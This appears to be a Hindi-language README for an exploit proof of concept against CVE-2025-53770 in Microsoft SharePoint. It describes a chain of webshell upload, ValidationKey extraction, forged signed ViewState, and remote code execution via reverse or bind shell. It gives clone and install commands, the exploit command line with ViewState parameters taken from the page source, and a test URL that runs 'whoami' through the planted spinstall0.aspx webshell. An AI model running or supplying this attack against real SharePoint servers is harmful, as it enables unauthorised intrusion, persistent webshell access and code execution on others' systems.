
CVE-2025-53770 के लिए एक्सप्लॉइट PoC जो SharePoint पर वेबशेल अपलोड, ValidationKey निष्कर्षण, हस्ताक्षरित ViewState निर्माण, और रिवर्स या बाइंड शेल के माध्यम से रिमोट कोड निष्पादन को सक्षम बनाता है।
यह पैकेज अनुमति देता है:
git clone <this-repo>
cd toolshell-exploit
pip3 install -r requirements.txt
वेबशेल अपलोड करें
SharePoint पेज से आप पेज सोर्स तक पहुँच सकते हैं। बस व्यू सोर्स टैब पर जाएँ और वहाँ से यदि उपलब्ध हो तो आपको निम्नलिखित मिलेगा, जिसे कॉपी किया जा सकता है:
A) __VIEWSTATEGENERATOR
B) __EVENTVALIDATION
C) (any current __VIEWSTATE for context)
python3 toolshell_exploit.py \
--target https://sharepoint.local \
--viewstate "<any_BASE64_VIEWSTATE>" \
--generator "<VIEWSTATEGENERATOR>" \
--eventval "<EVENTVALIDATION>"
यह spinstall0.aspx अपलोड करता है। जाँच करें: https://sharepoint.local/_layouts/15/spinstall0.aspx?cmd=whoami